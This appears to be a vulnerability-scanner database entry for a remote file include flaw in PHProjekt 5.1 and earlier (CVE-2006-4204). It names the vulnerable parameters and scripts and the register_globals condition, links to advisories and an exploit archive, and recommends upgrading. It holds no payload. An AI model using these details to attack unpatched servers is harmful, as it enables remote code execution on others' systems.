| VID |
21962 |
| Severity |
40 |
| Port |
80, ... |
| Protocol |
TCP |
| Class |
CGI |
| Detailed Description |
The PHProjekt program is vulnerable to multiple remote file include vulnerabilities which exist in versions 5.1 and earlier. PHProjekt is an open-source Groupware package written in PHP4. PHProjekt version 5.1 and earlier versions could allow a remote attacker to include malicious PHP files, caused by improper validation of user-supplied input passed to the 'path_pre' parameter of the 'lib/specialdays.php' script and the 'lib_path' parameter of the 'lib/dbman_filter.inc.php' script. If PHP's 'register_globals' setting is enabled, a remote attacker can send a specially-crafted URL request to execute arbitrary PHP code and operating system commands on the affected host.
* References:
http://phprojekt.com/modules.php?op=modload&name=News&file=article&sid=257&mode=thread&order=0
http://milw0rm.com/exploits/2190
http://www.frsirt.com/english/advisories/2006/3284
http://secunia.com/advisories/21526
* Platforms Affected:
PHProjekt versions prior to 5.1.1
Any operating system Any version |
| Recommendation |
Upgrade to the latest version of PHProjekt (5.1.1 or later), available from the PHProjekt Web site at http://www.phprojekt.com/ |
| Related URL |
CVE-2006-4204 (CVE) |
| Related URL |
19541 (SecurityFocus) |
| Related URL |
28560 (ISS) |
|
